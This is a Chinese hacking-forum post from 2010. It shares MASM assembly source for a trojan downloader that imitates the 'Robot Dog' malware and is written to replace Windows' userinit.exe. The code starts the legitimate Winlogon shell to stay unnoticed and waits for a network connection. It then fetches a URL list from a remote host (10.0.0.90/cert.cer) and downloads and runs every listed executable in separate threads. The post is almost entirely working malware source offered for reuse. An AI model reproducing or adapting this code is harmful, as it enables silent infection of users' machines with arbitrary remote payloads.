2495查看
0回复

[经验分享] 仿机器狗写入到userinit.exe文件的下载者源码

主题	好友	484 积分

中级会员

发消息

发表于 2010-2-11 13:37:01 |显示全部楼层

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 仿机器狗的感染文件代码
; by naitm(http://hi.baidu.com/naitm)
;
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
      .386
      .model flat,stdcall
      option casemap:none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include       windows.inc
include       user32.inc
includelib user32.lib
include       kernel32.inc
includelib kernel32.lib
include       Advapi32.inc
includelib Advapi32.lib
include       wininet.inc
includelib wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
      .data
nThreadCount dd       0
szTempPath       db    ’.’,0
szValueName       db       ’Shell’,0
szUser32Dll       db       ’user32.dll’,0
szLoadRemoteFonts db ’LoadRemoteFonts’,0
szSubKey          db    ’SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,0
szUrlList       db    ’http://10.0.0.90/cert.cer’,0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
      .code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;以当前进程的STARTUPINFO启动exe文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RunIt          proc @lpExePath

local @stStartupInfSTARTUPINFO
local @stProcessInformation:PROCESS_INFORMATION

invoke GetStartupInfo,addr @stStartupInfo
invoke CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\
            NULL,NULL,addr @stStartupInfo,addr @stProcessInformation

.if eax == 0
      invoke CloseHandle,@stProcessInformation.hThread
      invoke CloseHandle,@stProcessInformation.hProcess
.endif

ret

_RunIt          endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;下载文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadFile proc @lpURL,@lpSaveFile,@Buffer

local @hInternet,@hInternetFile,@hLocalFile,@NumberOfBytesWritten,@nNumberOfBytesToWrite,@nWriteCount
local @lpbuffer[200h]:BYTE

xor eax,eax
mov @nWriteCount,eax

invoke InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
.if eax != NULL
      mov @hInternet, eax
      invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4
      invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4
      invoke InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0
      .if eax != NULL
         mov @hInternetFile, eax
         mov @nNumberOfBytesToWrite, 0
         mov @NumberOfBytesWritten, 200h
         invoke HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\
                     addr @NumberOfBytesWritten,@nNumberOfBytesToWrite
         .if eax != NULL
            invoke CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0
            .if eax != 0FFFFFFFFh
                  mov @hLocalFile, eax
                  .while TRUE
                     mov @nNumberOfBytesToWrite,0
                     invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
                     .break .if (!eax)
                     .break .if (@nNumberOfBytesToWrite==0)
                     inc @nWriteCount
                     invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0
                  .endw
                  invoke SetEndOfFile,@hLocalFile
                  invoke CloseHandle,@hLocalFile
            .endif
         .endif
         invoke InternetCloseHandle,@hInternetFile
      .endif
      invoke InternetCloseHandle,@hInternet
.endif

mov eax,@nWriteCount

ret

_DownloadFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadEXERunIt proc @lpURL

local @DownTimes
local @TempFileName[100h]:BYTE
local @szUrl[100h]:BYTE

mov @DownTimes,3Ch
invoke lstrcpy,addr @szUrl,@lpURL
invoke RtlZeroMemory,addr @TempFileName,100h
invoke GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName

.repeat
      invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
      .if eax != NULL
         invoke _RunIt,addr @TempFileName
         .break
      .else
         invoke Sleep,3E8h
         dec @DownTimes
      .endif
.until (!@DownTimes)

dec nThreadCount

ret

_DownloadEXERunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
main proc

local @hKey,@nSizeOfPath,@hFile,@hObject,@lpBaseAddress
local @szWinlogonPath[104h]:BYTE

;加载user32.dll,执行LoadRemoteFonts函数（这函数是干吗的？）
invoke LoadLibrary,offset szUser32Dll
.if eax != NULL
      invoke GetProcAddress,eax,offset szLoadRemoteFonts
      .if eax != NULL
         call eax
      .endif
.endif

;启动winlogon
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey
.if eax == ERROR_SUCCESS
      mov @nSizeOfPath,104h
      invoke RtlZeroMemory,addr @szWinlogonPath,104h
      invoke RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath
      invoke _RunIt,addr @szWinlogonPath
      invoke RegCloseKey,@hKey
.endif

;检查网络是否连接，不断重试
invoke Sleep,3E8h
.while TRUE
      invoke InternetGetConnectedState,addr @nSizeOfPath,0
      .break .if eax
.endw

;取一个临时文件名，并下载列表
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath
invoke Sleep,3E8h
DownloadList:
.while TRUE
      invoke _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h
      .break .if eax
.endw

;打开列表文件，验证后开始下载
invoke CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL
.if eax != INVALID_HANDLE_VALUE
      mov @hFile,eax
      invoke GetFileSize,@hFile,NULL
      .if eax >= 0Fh ;文件提价小于F个字节则认为下载文件错误
         invoke CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL
         .if eax != NULL
            mov @hObject,eax
            invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0
            .if eax != NULL
                  mov @lpBaseAddress,eax
                  mov esi,eax

            BeginDownEXE:
                  lea edi,@szWinlogonPath
                  invoke RtlZeroMemory,edi,104h

                  ;查找回车标志，查找到后将@szWinlogonPath传入_DownloadEXERunIt
                  .repeat
                     lodsb
                     .if al == 0Ah
                        lodsb
                     .endif
                     .if al == 0Dh
                        .if @szWinlogonPath != 0
                              inc nThreadCount
                              invoke CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath
                              invoke CloseHandle,eax
                              invoke Sleep,64h
                        .endif
                        jmp BeginDownEXE
                     .endif
                     stosb
                  .until (!al)

                  invoke UnmapViewOfFile,@lpBaseAddress
            .endif
            invoke CloseHandle,@hObject
         .endif
      .else
         invoke CloseHandle,@hFile
         jmp DownloadList
      .endif
      invoke CloseHandle,@hFile
.else
      jmp DownloadList ;无法打开则重新下载
.endif

;不断sleep，直到所有线程结束
.while nThreadCount
      invoke Sleep,64h
.endw

invoke ExitProcess,0

main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start

使用道具举报

返回列表

		自动登录	找回密码
密码			注册会员

[经验分享] 仿机器狗写入到userinit.exe文件的下载者源码

快速发帖